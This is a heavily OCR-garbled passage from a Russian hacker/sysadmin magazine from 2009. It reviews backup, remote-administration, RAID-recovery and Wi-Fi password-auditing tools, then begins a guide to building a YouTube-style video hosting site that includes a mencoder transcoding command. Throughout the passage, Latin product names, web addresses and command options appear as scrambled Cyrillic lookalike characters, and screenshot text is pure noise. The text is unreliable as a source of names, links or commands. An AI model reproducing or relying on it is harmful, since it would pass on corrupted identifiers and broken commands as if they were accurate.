последнем случае будет автоматически инс- 
таллирован 5(2Б Ехргезз. Хочу напомнить, что 
бесплатный 50Б Ехргезз имеет свои ограни- 
чения: база данных до 4 Гб, поддерживается 
только 1 СРЕГ. Поэтому его применение для 
хранения информации, собранной ЭТА в боль- 
ших сетях, может быть неоправданно. Перед 
запуском инсталлятора устанавливаем роль ИЗ 
(подробности см. в статье «Слоеный ѴР№> из 
□С_08_2008). 

Не забываем открыть в брандмауэре порт 
2055/исІр, который используется ЭТАдля сбо- 
ра НеіРІоѵѵ информации, и 17777Лср — обмен 
данными между ЭТА и ЫМР. Далее в НеіРІоѵѵ 
ѴѴеЪ Сопзоіе (регистрируемся как абтіп, без 
пароля) при помощи «Ыеіѵѵогк Зопаг ѴѴігагсІ» 
подключаем Ріоѵѵ источники, с которых будем 
собирать информацию. 



ХАКЕР 12 /132/ 09 





В целом, интерфейс программы достаточно прост, хотя некоторое 
время все же придется потратить на его освоение. В скачанных архивах 
программы найдешь документацию на языке Шекспира, но пошаговые 
инструкции мастеров понятны и без перевода. 

РАК5Т0ЫЕ 0КІѴЕС1.0ЫЕ5ЕКѴЕК Ѵ6.0 

Разработчик: РагЗіопе ТесЬпоІо^у, Іпс. 

ѴѴеЬ : ѵѵѵѵѵѵ.^аг 8І:опе. сот /зо^Шаге /сігіѵесіопе-зег ѵег.Ьіт 
Системные требования : Репііит III и выше, 512 Мб ОЗУ ( 1 Гб ѴІ8Іа) 
Серверные ѴѴіп ОС: ѴѴіпбоѵѵз Зегѵег 2003 5Р2/К2 (32/64 бит), 
ѴѴіпбоѵѵз Зегѵег 2008 

Десктопные ѴѴіп ОС: ѴѴіпбоѵѵ8ХР/ѴІ8І:а/7 (32/64 бит) 

Ілпих: 8И8Е, Кеб Наі, Ребога, ІіЬипШ, Мапбгіѵа (версия Ехрге88) 

На серверах и компьютерах пользователей хранятся тонны ценной 
информации, поэтому одной из важных задач любого сисадмина 
является ее сохранение — резервирование и восстановление в случае 
необходимости. Решений, предназначенных для резервного копиро- 
вания данных, сегодня более чем предостаточно. Все они отличаются 
функционально, списком поддерживаемых ОС и файловых систем 
(обзор Асгопіз Тше Іта§е Епіегргізе Зегѵег читай в Х_03_2007) . На 
постсоветском пространстве РагЗіопе ОгіѵеСІопе Зегѵег (БС5) менее 
известен, несмотря на простоту в использовании и функциональность. 
Так БСЗ позволяет сохранять данные путем резервного копирования 
и создания снимков разделов или всего жесткого диска. Поддержива- 
ются дисковые массивы КАЮ 0/1/5/10, ЛЮБ и многие популярные 
файловые системы: РАТ32, ОТРЗ, Ілпих ЕХТ2/3. Разделы с неизвестной 



проге ФС копируются посекторно, поэтому ограничений фактически 
нет. Резервная копия может содержать файлы ОС, базу ЗС^Ь, ЕхсЬап^е 
Зегѵег, ЗЬаге Роіт и файлы некоторых других установленных серверов. 
Всю персональную информацию, файлы ОС, настройки программ и 
прочие важные установки прога дублирует в виде отдельного архива 
на: СБ/САЮ диск, 118 В -устройств о, РТР-сервер или другой жесткий диск 
компьютера. Чтобы уберечь ценные данные от чужих глаз, архив шиф- 
руется при помощи АЕ8 с ключом 128/192/256 бит. Есть возможность 
редактирования файлов в образе. 

Технология создания снимков получила название Зузіет ЗпарзЬоі: и 
позволяет использовать созданные мгновенные снимки для возвра- 
щения системы в рабочее состояние после сбоя. БСЗ умеет копировать 
и открытые приложениями файлы, над которыми еще производится 
работа, гарантируя целостность резервной копии, поддерживается тех- 
нология теневого копирования (Ѵоіите ЗЬабоѵѵСору). Снимок также 
позволяет быстро «переместить» сервер на новый диск или оборудова- 
ние. Информацию на старом диске можно гарантированно уничтожить 
при помощи шредера, работающего по методу удаления данных ИЗ 
ИерагйпетоШеІепзе (5220.22-М). 

Снапшот диска на рабочей системе создается за 5-10 секунд, система 
может быть восстановлена буквально за минуту. Клонирование систем 
заметно упрощает операцию развертывания ОС на большом коли- 
чество компьютеров. Если клонируется диск иных размеров, чем на 
приемнике, ИгіѵеСІопе может изменять объем логических разделов. 
Предусмотрена возможность создания загрузочных дисков, содержа- 
щих все необходимое ПО. Поддержка РХЕ дает возможность развернуть 
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> ІПІО 

• ОгіѵеСІопе загру- 
жается раньше ОС и 
доступна даже в том 
случае, когда ОС серве- 
ра не за пускается, что 
позволяет при необхо- 
димости восстановить 
упавшую операционку. 

• Функционально 
ЫеЮр Кетоіе Сопігоі 
состоит из двух основ- 
ных модулей: Нозіи 
Эиезі. 

• СовременныеОС 
ѴѴіпсІоѵѵз, Ыпих, *В50 
поддерживают зо^ 

РАЮ 0, 1 и 5. 

• РАЮ Ресопзігисіог 
поддерживает массивы 
РАЮ 0 и 5, состоящие из 
2-14дисков. 




> СІѴСІ 

В видеоролике, 
который ты найдешь 
на прилагаемом 
кжурналу диске, 
продемонстриро- 
ваны основные 
возможности утилит 
РАЮ Ресопзігисіог, 
ОатеѴѴаге І\ІТ 
ІЛіІіііез, ІМеЮр 
Ретоіе Сопігоі, 
РОІЫТОЕѴ ЮЕАІ 
Весите и ЕагЗіопе 
ОгіѵеСІопе Зегѵег. 

За создание этого 
ролика хочу поблаго- 
дарить своего друга 
и коллегу Сергея 
Яремчука. 
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в НАСТРОЙКЕ ошоы ыта помогают мастера 



'ГЗКІЭ 



\т 



снимок на любом компьютере по сети. Созданный образ 
диска легко конвертируется в образ ѴМѵѵаге Ѵігшаі Бізк, 
пригодный для использования в одноименной виртуаль- 
ной машине. 

Программа ОгіѵеСІопе загружается раньше ОС и доступна 
даже в том случае, когда ОС сервера не запускается, что 
позволяет при необходимости восстановить упавшую 
операционку. 

На сайте проекта можно скачать триал версию, которая 
будет полнофункциональна в течение 14 дней. Интерфейс 
программы достаточно прост, хотя и не локализован. 
Выбираем одну из пяти вкладок, соответствующую даль- 
нейшей задаче (ВаскІІр, Кезсоге, Сіопе и пр.), далее все ос- 
новные операции осуществляются при помощи мастеров, 
помогающих быстро произвести необходимые установки и 
запустить процесс создания копии/восстановления. 
Дополнительно стоит отметить наличие версии Ехргезз, не 
требующей установки на хард (работает с СБ) . 

РОІЫЮЕѴ ШЕАІ_5ЕСІШЕ Ѵ.1.8 

Разработчик: Роіпісіеѵ 
ѴѴеЪ: ѵѵѵѵѵѵ.роіпісіеѵ.сот 

Системные требования: минимальные системные 

требования, предъявляемые к ОС 

ОС: ѴѴіпсІоѵѵз ОТ/ХР/Ѵіз1:а/2000 /2003/2008/7 (32/64 

бит) 

Управление большим парком разнородных систем никогда 
не было простой задачей, где-то помогают политики СРО, 
где-то скрипты, где-то опыт, но все равно допускаются 
досадные ошибки, которых хотелось бы и можно избежать. 
Решение РОМГОЕѴ ГОЕАЬ Зесиге позволяет осущест- 
влять удаленное управление разнородными системами, 
оптимизировать настройки и повысить защищенность. 

Для подключения к клиентским системам не потребуется 



установка дополнительных агентов, только соответствую- 
щие права. Поэтому развертывание заключается, по сути, 
в установке консоли ГОЕАЬ Зесиге на компьютер админа. 
Клиентская система может находиться в локальной сети, 
интернет или виртуальной частной сети. Программа имеет 
удобный интерфейс, который позволяет управлять одним 
или любым количеством компьютеров, подключившись к 
нему индивидуально или выбрав группу ЫеііВІОЗ, объекты 
Асгіѵе ОігесСогу. После подключения к локальной/уда- 
ленной системе администратор получает полный доступ 
к настройкам всех ее параметров. Например, во вкладке 
Асгіоп находим четыре группы параметров: ѴѴіпсІоѵѵз, 
Нагбѵѵаге, ЫеСѵѵогк и ѴѴіпсІоѵѵз Сотропешз. При выборе 
одного из пунктов он раскрывается на подкомпоненты, 
обеспечивающие доступ к специфическим настройкам 
фезкгор, Зузгет, ѴѴіпсІоѵѵз Прсіаге, №гѵѵогкапсІ Іпгегпеі: 
Соппесгіоп и т.п.) Далее выбираем конкретный параметр и 
активируем/отключаем его. Удобно, что выбор возможных 
действий представлен в зависимости от версии ОС, поэто- 
му не нужно ломать голову, что и для какой ѴѴіпсІоѵѵз нужно 
включать. Для удобства часто используемые настройки 
сохраняются в Еаѵогпез. Кроме категорий, организован 
поиск параметров по ключевому слову (например «СЭ- 
КОМ"), что позволяет быстро найти все необходимое. Что- 
бы не применять все Асгіоп по одному, используя кнопку 
«АсЫ», их собирают в «Зеіесгесі Асгіопз» и затем активируют 
одновременно. Собранные таким образом группы уста- 
новок опять сохраняются и при необходимости повторно 
активируются. В меню доступен редактор действий (Асйоп 
Есійог) — мастер, при помощи которого можно отредакти- 
ровать или создать новый набор настроек. 

Кроме этого, ряд действий распределен по темам (ТЪетез), 
в которых собраны наиболее востребованные установки 
(спрятать консоль «Установка и удаление программ». 
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ШЕАІ.5ЕСІІВЕ ПОМОЖЕТУСИЛИТЬЗАЩИТУ СИСТЕМ 




ЫЕТОР НЕМОТЕ СОЫТКОІ. ЯВЛЯЕТСЯ ОДНОЙ ИЗ СА- 
МЫХ ПОПУЛЯРНЫХ ПРОГРАММ ДЛЯ УДАЛЕННОГО 
УПРАВЛЕНИЯ 
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ИНТЕРФЕЙС РАВ5Т0ЫЕ ОКІѴЕССОЫЕ 
ДОСТАТОЧНО ПРОСТ 



отключить Асгіѵе Безкіюр и другие) . Часто используемые темы также 
выводятся в «Раѵогіие асгіопз», ведется история тем, которые уже при- 
менялись к компьютерам. Список Асгіоп автоматически обновляется с 
сайта производителя. 

Помимо Асгіопз есть и другие вкладки, позволяющие получить доступ к 
веткам реестра, просмотреть список зарегистрированных пользовате- 
лей и информацию по системе (ОС, железо, установленные обновления 
ит.п.) 

Самое главное, что произведя любую операцию, ты не только усилишь 
безопасность, но и будешь четко знать, что, где и когда изменено, и 
какой это имело эффект и последствия. Если же результат не удовлетво- 
ряет, любое действие можно отменить. 

На сайте производителя доступна триальная версия, которая будет 
полнофункциональна в течение 30 дней и поддерживать настройку 50 
компьютеров. 

ЫЕТОР НЕМОТЕ С0ЫТК01. 9.22 ВШІЛ) 2009105 

Разработчик: ИеЮр А/5 
\ѴеЪ: ѵѵмпѵ.пеіюр.ги 

Системные требования: минимальные системные требования, 
предъявляемые к ОС 

ОС: ѴѴіпс1ош8 НТ5Р4/98/Ме/2000/ХР/2003/ѴІ8Іа/2008, Ілпих 
(КесІНаІ: 8/9/10, КесШа* 7.x, Мапбгаке 10, 8и8Е 8.Х/9.0), 8о1агІ8, 
08/2, Б08, ѴѴіпсіоѵѵя МоЬіІе и 8утЬіап 

При большом количестве компьютеров программа удаленного адми- 
нистрирования становится просто необходимой, иначе админ будет об- 
речен постоянно бегать по этажам, решая мелкие проблемы пользовате- 



лей. ЫеЮр Кетозе Сопігоі, в силу своих продвинутых возможностей, уже 
заслужила доверие администраторов и имеет ряд наград от различных 
журналов. Подключившись к удаленной системе, админ видит десктоп 
и может управлять компьютером так, как будто находится за рабочим 
столом рядом с пользователем, настраивать службы, работать с команд- 
ной строкой, реестром, подключаться к дискам и т.д. Местонахождение 
клиента (І/Ш, ѴѴАМ или ѴРЫ) при этом роли не играет, поддерживаются 
основные коммуникационные протоколы — ТСР/ІР, ЕГОР, ІРХ, ЫеііВІОЗ, 
модемные подключения, инфракрасный порт и Тегтіпаі Зегѵег. Предус- 
мотрена передача на удаленную систему клавиатурных команд (СТКЬ- 
АЬТ-ПЕЬ и т.п.), простая отсылка файлов методом Пга^'п'Пгор, обмен 
данными через буфер обмена, автоматическое восстановление сеанса 
после обрыва связи. Реализован текстовый, аудио-видеочат, а также 
режим демонстрации, когда показывается экран компьютера админа, 
поэтому вариантов оказания помощи достаточно много. Кроме того, в 
последних релизах появилась новая функция ІпѵепШгу, которая позволя- 
ет собирать информацию об установленном оборудовании и ПО с целью 
инвентаризации и контроля за их использованием, отчет затем можно 
сохранить в ХМЬ-файл. Рутинные операции предлагается автоматизи- 
ровать при помощи скриптов. Функционально ЫеЮр КетоЩ Сопігоі со- 
стоит из двух основных модулей: Нозі: и Сиези. На компьютере админист- 
ратора, с которого будет осуществляться удаленное управление другими 
системами, устанавливается модуль СиезЦ на клиентах развертывается 
модуль Но5Е В больших разветвленных и защищенных сетях могут воз- 
никнуть проблемы с маршрутизацией и подключением к клиентским 
компьютерам. Для их решения предлагаются дополнительные модули 
Сагеѵѵау, ѴѴеЪСоппесЦ Нате Зегѵег, ЗесигПу Зегѵег, МоЬіІе & ЕтЪесІсІесІ, 
которые лицензируются отдельно. Еще один модуль — Оп Бетапс! — 
позволяет управлять удаленными системами без установки агента. Из 
дополнительных возможностей стоит отметить запись всего происхо- 
дящего на экране на видео, удаленная печать. Весь трафик шифруется 
с использованием алгоритма АЕ8-256, реализована аутентификация 
при помощи смарт-карт, К8А Зесиге ГО и Асгіѵе ПігесЮгу. Поддержка 
ІтеІѵРго позволяет управлять удаленной системой до загрузки ОС, в 
том числе изменять настройки ВІ05 . Скачать модули можно с сайта Ьеір. 
пешр.сот/боѵтіоасі, но для установки и работы потребуются ключи, для 
получения которых требуется регистрация на сайте. Обрати внимание, 
что отдельно доступна русская и английская версии (последняя свежее) . 
Установка модулей достаточно проста. По окончании установки Сиезі: 
будет запущен мастер, который поможет настроить сетевые соединения. 
Каких-либо возможностей по развертыванию клиентских Нозі: модулей в 
консоли управления не предусмотрено. Для этого необходимо использо- 
вать отдельный №Юр Раск'п Беріоу или выбрать другой путь, например 
установку при помощи групповых политик. Во время инсталляции Нови 
будет запрошен пароль обслуживания, который будет затем запра- 



ХАКЕР 12 /132/ 09 



► 121 






ЗѴЫХАСК 



т 



Ваій Р.ес0іг5Іпк*ог (Ѵсгііоп 4.02> 






Е«1 Тк* Не]р 






5сІееЕ іНе ПАЮ Іуре. 

Бресту Иге ПІММЫн о| іігіѵса іп Ікіі ПАЮ 

Нага* іЬе шриі іігіѵсх іи мппуе* іЬйі еогмЫиІе ІКе ВАЮ. 
□іск н 0рсп гігіѵт н 



яаюел* 

І Наше 



[ідюТ 



~3 



Ясіг^ѵе-г 



Г 



Рггѵві: 

0гіѵе2 

ОгіѵеЗ; 

ОггтеІ 

Опѵеб - 

Онѵвб: 

Огіѵв? 

Рпѵе# 

ѴгмВ 

РгІѴфІО 

ОЙѵвІІ 

РгіѵеІЗ: 

□пѵеіі 

Ргіѵе14“ 



нош 


нот 


ІЙ* 


т щ в 


1 ИІ 


■ 1 г 


л шт 


Л к* 


*** 


шт* 


тшт 


тшт 


4 11 



Бесіоп 

(ЫмяЯ 

(сЫей| 



БіааЕ о* 1Ье ВАІР оп еэ-сЬ іпфѵііилі ЛЬч (шивИу 0^ 

Тоіаі кесіоіа аѵаіІаЫс іп ОАЮ; ц/а 

ВЬскаг*с [ІЁ 






»в^0ГЕ [®К@) 



Екие йіѵе 



Рвгіуідоіопг 3 

Дреп ііггѵе? 




□іск "Апдіуге*' лжі іЬі* ргпфЛЕп «Й 1 І сіпійіпир 
іЬс спігссі ііііре іі^с. гігіѵс пггісгР ілеі иоіаііа 

ІИаІУ? 




СНаоіс уои №ШІ Іи сору Оів ПАШ йп 

іКел сКіск м Сору'' 



Ѵігіиаі I гаадч 



Ндав о( ІЫ л&ийі ітадё: 



РНухісЫ Оіік 



Сор5 




Р іплііу. ІЛР (Ьп п>сіеѵ,ѵіпгі ПАІР ітоде аі іпрв 
(иг оиі "БиіБаІі][<ііск и аг Таріаіп Мето 11 ап 
сшпііісіс іЬа гіаіа іссоѵару 



Ода ѵтий ітаде " иг 

* СасіаіпЦето 

• йоіРс^Васк ГогМІГ5 

* В«ЬЕяЯоіеіі«.Н.ГСЗ 

• Но>ераД \ебл ді ѵжц] 



ІтГСр : /іѴуаѵ .гипіі гое огд 



Меп»гу іп и»: 566 680 0 Іод теяаде: ЦИкенанІ Еѵ^^а^огі «ег лс-г, 

СПАСТИ ИНФОРМАЦИЮ С РАШ 0/5 МОЖНО \ПРИ ПОМОЩИ РАШ РЕС0Ы5ТРІІСТ0Р 



шиваться при входе на клиентскую систему. 
Непосредственно перед началом работы Нозі: 
нужно выбрать профиль связи (Средства — Ком- 
муникационные профили) , указав протокол для 
подключения, иначе клиент не будет активен, 
и соединиться с ним будет невозможно. Далее 
все просто, интерфейс достаточно понятен. 

Если пользователь не должен знать о присутс- 
твии ИеЮр на клиентском компьютере, значок 
прячется. Если в сети используется несколько 
Сиези, то произведя все настройки на одном из 
них, можно экспортировать данные на сменный 
носитель. 

ОАМЕѴѴАКЕ ЫТ ІІТІЫТІЕБ (ОІІТІЛ 

Разработчик: БатеѴѴаге Оеѵеіортепі: 

\ѴеЬ : ѵѵѵѵѵѵ. сі атешаге . г и /п1_иШШе 8 . Ьіті 
Системные требования: минимальные сис- 
темные требования, предъявляемые к ОС 
ОС: ѴѴіпбоѵге ОТ5Р1 /2000/ХР/2003/ 
ѴІ8*а/2008 (32/64 бит) 

БатеѴѴаге ОТ ШНйез (БОТЕТ) — это мощная 
система удаленного управления ѴѴіпбоѵѵз 
системами, предлагающая много больше 
возможностей, чем штатный ММС. Интерфейс 



БОТЕТ, выполненный в стиле Проводника, обес- 
печивает простой и удобный доступ практи- 
чески ко всем стандартным утилитам ѴѴіпбоѵѵз 
(консольным и графическим) . При наличии 
Асгіѵе ПігесФгу админ может получить список 
объектов (используя фильтры или поиск) и 
произвести любые операции над атрибута- 
ми — ОІІ, контейнерами, пользователями и 
группами, компьютерами, общими ресурсами. 
В том числе в списке есть и атрибуты, недоступ- 
ные из консоли ММС (например, логотипы, 
идентификаторы пользователей и т.д.) После 
установки ПОТИ автоматически произведет 
сканирование сети и проверит наличие Асгіѵе 
БпесЮгу, получит список рабочих станций, 
серверов, контроллеров доменов и компьюте- 
ров. В последнюю группу (Сотрілегз) вклю- 
чены те системы, которые не видны в сетевом 
окружении. Если система не обнаружена, ее 
можно добавить вручную, указав ІР-адрес. 
После этого просто выбираем нужную систему 
и производим все необходимые операции над 
дисками, реестром, группами, открытыми 
файлами, принтерами, процессами. При необ- 
ходимости можно подключиться к удаленной 



системе по протоколу ВХ>Р. Кроме этого, в 
поставку БОТЕГ включены и два специализи- 
рованных приложения. Программа БатеѴѴаге 
Міпі КетоЩ Сопігоі обеспечивает удаленное 
управление, для чего на клиентскую машину 
устанавливается легкий агент. Для сбора 
информации с систем в сети используется 
БатеѴѴаге ОТ ЕШШез Ехрогшг (БѴѴЕхрогііег), на 
выходе получаем отчет в нескольких форматах 
(ХМЬ, С5Ѵ, ТХТ) . Но главной особенностью 
ПОТИ является схема лицензирования. Лицен- 
зирование зависит от числа администраторов, 
которые будут управлять системами, и не зави- 
сит от количества рабочих станций и серверов. 
Для скачивания доступна полнофункциональ- 
ная 30-дневная пробная версия. 

ЕІСОМБОРТѴѴІКЕІЕБББЕСиКІТѴАІЮІТОК 

Разработчик: Еісотзой Со. игі. 

ѴѴеЪ: ѵѵѵѵѵ\/.е1сот8оЛ.ги 
Системные требования: минимальные сис- 
темные требования, предъявляемые к ОС 
ОС: ѴѴіпсіоѵѵ8 98/Ме/2000/ХР/2003/ 
ѴІ8іа/2008 

Широкое использование беспроводных 
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сетей ставит перед администратором задачу по повышению их 
защищенности и аудиту использования. Корпорация Еісотзоіт, 
известная своими программами по восстановлению паролей к 
различным типам файлов, предлагает утилиту ѴѴігеІезз Зесигпу 
Аийпог (ѴѴ5А), которая является на сегодня одной из самых быстрых 
и наиболее эффективных программ по аудиту паролей в ѴѴіРі сетях. 
Принцип действия, в общем-то, прост и стандартен для такого рода 
приложений: пакеты отлавливаются сторонними программами, 
затем они импортируются в ѴѴ5А, где производится попытка восста- 
новить ѴѴРА/ѴѴРА2-Р5К пароль. На основе результата оценивается 
защищенность. 

Интересно, что для восстановления паролей задействуются возмож- 
ности графических карт. Для подбора используется атака по словарю с 
настраиваемыми мутациями (заглавные строчные буквы, изменение 
слова, удаление, перестановка букв и прочее), в поставке имеется 
английский словарь. Поддерживается до 4 видеокарт ІЧѴГОІА (от 
СеРогсе 8 и выше) или АТІ (Кабеоп НВ 3000 Зегіез и выше), поэтому 
ѴѴ5А может сравниться по производительности с мощными серве- 
рами. В качестве входных данных принимается файл стандартного 
формата Щрбшпр, который поддерживается практически всеми ѴѴіРі 
сниферами (Аігосгаск-п§, ОтпіРеек, АіШеГепзе и другие). Возможен 
импорт системных хешей паролей, полученных программой Еісотзоіт 
Ргоасйѵе 5у$1:ет Раззѵѵогсі Кесоѵегу (Р5РК), и файлов СоттѴіеѵѵ. Оста- 
лось добавить, что интерфейс локализован, и программа достаточно 
проста в использовании. 



КАШ ВЕСОЫБТКиСТОК Ѵ 4.00 

Разработчик: Ріехега ЗоГШаге, Іпс. 

ѴѴеЪ: \лгѵѵѵѵ.гипііте.ог§/гаЫ.Ьі:т 

Системные требования: минимальные системные требования, 
предъявляемые к ОС ОС: ѴѴіпсІоѵѵз 2000/ХР/2003/Ѵі§1:а/2008 

Программа КАЮ Кесопзітіісііог предоставляет возможность восстано- 
вить информацию с КАЮ 0 и 5, а также сами массивы, если в случае сбо- 
ев они перестали читаться системой. Если данные массива не известны, 
КАШ КесопзітіісШг произведет сканирование и установит правильные 
параметры автоматически. Результат может быть сохранен в ѴІМ образ, 
ІМС файл или на другой жесткий диск. В случае, если ОС уже не загружа- 
ется, предлагается использовать ВаНРЕ-диск (ѵ\тч/ѵ.гипйте.ог§/реЪ. 
Ьит), который собирается самостоятельно. 

Программа достаточно проста и понятна в использовании. Некоторые 
операции легко автоматизируются при помощи скриптов, для чего 
в состав включен специальный редактор с несколькими примерами 
(язык похож на ѴВ) . Из дополнительных инструментов можно отметить 
наличие ХОК и Ешгору тестов. 

Кстати, КАШ КесопзітіісЮг — не единственная программа, имеющая 
такую функциональность, если она по каким-то причинам не спра- 
вилась с задачей или не подошла, тогда присмотрись к ОпТгаск КАГО 

Кесоѵегу Сѵѵтѵ.опітасЫаЩгесоѵегу.сот/гаіб-гесоѵегу) или Каісі 
Кесоѵегу от Оізкіпіегпак (ддчдпѵ.сіізкіпііегпаіз.сот/гаісі-гесоѵегу). Ноя 

искренне надеюсь, что тебе не придется прибегнуть к подобного рода 
программам, т 
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ЗУИХАСК 



■ ■ ЕВГЕНИЙ ЗОБНИН ЛМ@5ѴМАСК.РЦ 



Говорит 
и показывает 
ѴѴеЬ 2.0 

Создаем собственный ѴоиТиЬе 

Сегодня во всемирной паутине видео находится на пике своей популярнос- 
ти, каждый день рождаются новые интернет-телеканалы и видеохостинги, 
возможности обмена видеоматериалами встраиваются в социальные сети. 
Это невероятно прибыльная ниша, и оставаться в стороне — непозволи- 
тельная роскошь. Из статьи ты узнаешь, как работает видеохостинг и по- 
лучишь пошаговые инструкции по созданию своего сервиса наподобие 
ютуба. 



ВИДЕО НА САЙТЕ Есть несколько способов 
организовать показ видео на своем сайте. 
Наиболее простой и менее затратный с точки 
зрения финансов — использование АРІ сторон- 
них видео-сервисов (таких, как оишЪе.сот) 
для встраивания видео в страницу. 

В первом случае этот подход выглядит просто 
как подключение специального плагина к СМ5 
(например, ЕтЪеббеб Мебіа Еіеіб для Эгираі), 
который как раз и позволяет проигрывать 
видео, опубликованное на одном из видео-сер- 
висов. Однако в этой схеме кроется серьезный 
минус. Для публикации видео на твоем сайте 
пользователю придется сначала перейти на 
сайт видео-сервиса, залить видео, скопировать 
ссылку, передать ее тебе, после чего ты смо- 
жешь скормить ее плагину, который встроит 
видео в сайт. 

Минус можно превратить в плюс, если вос- 
пользоваться другим плагином, предназначен- 
ным для заливки видео на различные сервисы 
(например, плагин Ѵібео Иріоаб для Эгираі) . 
Это позволит тебе и другим пользователям 
воспользоваться специальной формой для 
заливки своего видео, а при некоторой дора- 
ботке и скрещивании с плагином для показа 
видео — и для автоматического встраивания 
его в страницу. 

Использование сторонних сервисов обеспечит 
нужную функциональность безденежных 
вложений, покупки выделенного сервера и 
с минимальными трудозатратами. Но здесь 
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есть несколько проблем: а) большинство 
видео-сервисов накладывают ограничение на 
используемый тобой контент, включая запрет 
на его трансляцию в коммерческих целях; б) 
видео-сервисы обычно вставляют рекламу, 
полупрозрачные копирайты и т.п. в распро- 
страняемые ими ролики; с) ссылки будут вести 
на сайт-источник видео, что будет свидетельс- 
твовать о дешевизне твоего сайта. 

Чтобы обойти и эти проблемы, можно 
обратиться к профессионалам — компани- 
ям-видеопровайдерам, которые позволят 
тебе создать полноценный видео-проект с 
подогнанным под дизайн сайта флеш-пле- 
ером, возможностью кодирования видео 
в любой указанный тобой формат и необ- 
ходимыми инструментами для загрузки 
роликов. А также предоставят инструмен- 
ты для ведения статистики, редактирова- 
ния роликов, вставки рекламы и многого 
другого. 

Цены за услуги подобного провайдера хоть 
и кусаются (в среднем — несколько сотен 
долларов в месяц), но вполне приемлемы для 
компаний, не имеющих собственных специа- 
листов или времени для создания полноценно- 
го видео-сервиса. 

Если же и этот вариант не годится, то единст- 
венный верный путь — создание собственного 
видео-сервиса, что вполне по силам грамотно- 
му сисадмину и небольшой команде ѵѵеЪ-деве- 
лоперов. 



СВОИ УСШТЦВЕ Итак, ты решил остановиться 
на создании своей версии УоиТиЪе с блэкдже- 
ком и клубничкой. Для начала тебе понадобит- 
ся мощный выделенный сервер с объемным 
хранилищем данных (нескольких Тб на первое 
время хватит) . Хостинги отметаются сразу, по- 
тому как: а) видео-сервис создает существен- 
ные нагрузки, и большинство хостеров просто 
не смогут предоставить тебе достаточных 
мощностей; б) для организации видео-серви- 
са на сервер должны быть предустановлены 
некоторые не совсем стандартные софтины, 
например тепсобег или {Ттре§. 

Далее ты должен определиться с тем, в каком 
формате посетители будут получать контент с 
твоего ресурса. Ясно, что лучше использовать 
ЕЬѴ, но ЕЬѴ — всего лишь контейнер, внутри 
которого хранится видео, закодированное вы- 
бранным тобой кодеком. В простейшем случае 
это будет Н.263, то есть МРЕС-1 или МРЕС-2 с 
битрейтом порядка 100 Кбит/с. Сжатые с по- 
мощью Н.263 ролики характеризуются малым 
весом и низким качеством, благодаря чему 
могут передаваться по низкоскоростным ка- 
налам связи, проигрываться на маломощных 
устройствах, но в то же время они очень убоги 
в визуальном плане. УоиТиЪе и большинство 
других видеохостингов использует Н.263 по 
умолчанию. 

Начиная с девятой версии, флеш-плеер от 
АбоЪе поддерживает также и кодек Н.264, 
более известный под именами АѴС и МРЕС-4 
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Рап 12. Н.264 позволяет передавать ролики в весьма высоком качестве, 
ценой чему будет невозможность его проигрывания на маломощных 
устройствах (смартфоны, некоторые нетбуки) . В то же время вес ролика 
может оставаться прежним. 

Некоторые видеохостинги (тотжеУоиТиЪе) кодируют заливаемое 
на его сервера видео одновременно двумя кодеками: Н.263 и Н.264. 
Благодаря этому пользователь вправе сам выбрать качество просматри- 
ваемого ролика. Но есть и обратная сторона медали: такое «двуличие» 
создает большую нагрузку на сервер, поскольку теперь требуется два 
прогона кодировщика (причем кодировщик Н.264 съедает гораздо 
больше процессорных ресурсов и памяти) и больший объем дисковой 
памяти. 

И — третье. Ты должен создать соответствующую инфраструктуру для 
кодирования роликов и отдачи их посетителям. Эта инфраструктура 
должна включать в себя движок перекодировки, базу данных, флеш- 
плеер, а также всю наружную обертку сайта. 

Движок для кодирования видео обычно строится поверх знакомых всем 
юниксоидам универсальных инструментов для обработки видео — 
Шпре§, тепсобег или коммерческого решения под названием ЗобЫпк 

Ѵібео Епсобег Еп§іпе (ѵѵѵѵмл^оііЫпк.сот/ргобиси/ѵібео-епсобег- 
еп^іпе/Ііпих.Ьші) . 

База данных используется для хранения информации о роликах, 
посетителях, популярности и всем том, что может понадобиться 
для ведения статистики. Флеш-плеер может быть выбран, исходя из 
личных предпочтений, хотя обычно выбор падает на 6ѴѴ Ріауег (ѵѵтлплл 

Іоп^ііаіІѵібео.сот/рІаѵегз/іѵѵ-Пѵ-рІаѵег) . полностью открытый и 
бесплатный для некоммерческого использования (но стоящий денег, 
совсем небольших, надо сказать, в случае применения для создания 
коммерческих сайтов) . 

Для объединения всего этого вместе может быть использована почти 
любая СМ5, имеющая специальные плагины, предназначенные для 
создания системы распространения видео-контента. Такие плагины 
есть для Бгііраі, боотіа и многих других. При правильной переработке 
они легко превратятся в то, что нужно конкретно тебе. Кроме того, 
существует множество скриптов (в большинстве своем платных), кото- 
рые можно использовать в качестве фундамента будущего сайта: ѵѵѵѵѵѵ. 
Ъиѵзсгірщ.іп/ѵоііііііЪе сІопе.ЬішІ. ѵѵѵѵѵѵ.аізіігазоіксот/ѵісіеозііаге. 
ІЧт. ѵѵѵ\дл/.с1ір-5Ііаге.сот . 

КАК ЭТО РАБОТАЕТ Ддя описания всех этапов создания видеохостин- 
га потребовалась бы целая книга, поэтому в этом разделе я дам лишь 
краткое описание того, как работает простейшая система потокового 
вещания видео в стиле ѴѴеЪ 2.0. 

Все начинается с заполнения посетителем специальной формы, значе- 
ния полей которой передаются скрипту, осуществляющему загрузку 
видео с машины клиента и помещающему его в некое хранилище на 



сервере. Имя посетителя, раздел, куда следует поместить ролик, и 
другие данные записываются в базу данных. Далее происходит вызов 
скрипта, ответственного за перекодировку видео. Он исполняет при- 
мерно такую команду: 

# тепсобег іприб.аѵі -обрз 12 -о ѵібео.біѵ -об Іаѵб 
-іаѵборбз \ 

і_с ег б і бу_бЬаб_ту_ѵіс 1 ео_з б г еат_с!ое з_поб_из е_Ъ_бг ате з 
-оас Іаѵс -іаѵсорбз \ 

асобес=трЗ : аЬібгабе=32 -згабе 22050 -оѵс Іаѵс -Іаѵсорбз 
ѵсосІес=б 1 ѵ: \ 

ѵЪібгабе=100 : тЬс!=2 :тѵ0 : бгеіі : ѵ4тѵ: сЬр : 1азб_ 
ргеб=3 : ргебіа=2 : с!іа=2 : \ 

ѵтах_Ъ_бгатез=0 : ѵЪ_збгабеду=1 :ргестр=2 : стр=2 : зиЬстр=2 : 
ргете= 2 : дпз =2 \ 

-ѵор зса1е=3б0 : 240 

Где опции ѵЬпгаЩ = 100 и $са1е = 360:240 задают битрейт, равный 100 
Кбит/с (оптимальный вариант для соединений в 128 Кб/с) и размер 
360:240. Ролик помещается в отдельное хранилище, его метаданные и 
